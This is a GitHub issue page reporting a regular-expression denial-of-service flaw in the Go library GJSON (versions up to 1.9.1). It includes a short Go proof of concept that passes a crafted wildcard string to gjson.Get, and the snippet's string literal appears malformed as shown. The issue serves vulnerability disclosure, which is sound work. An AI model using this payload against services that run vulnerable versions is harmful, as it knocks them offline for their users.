Skip to content

gjson.Get can cause DoS attacks. GJSON <= 1.9.1 allows attackers to cause a redos via crafted JSON input. #236

New issue
New issue
Closed
Closed
gjson.Get can cause DoS attacks. GJSON <= 1.9.1 allows attackers to cause a redos via crafted JSON input.#236
@cmdrgh

Description

@cmdrgh
cmdrgh
opened on Oct 1, 2021

func main() {
testJson := #[%"*?**?**?**?**?**?***?**?**?**?**?*"""]
gjson.Get(testJson, testJson)
}

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions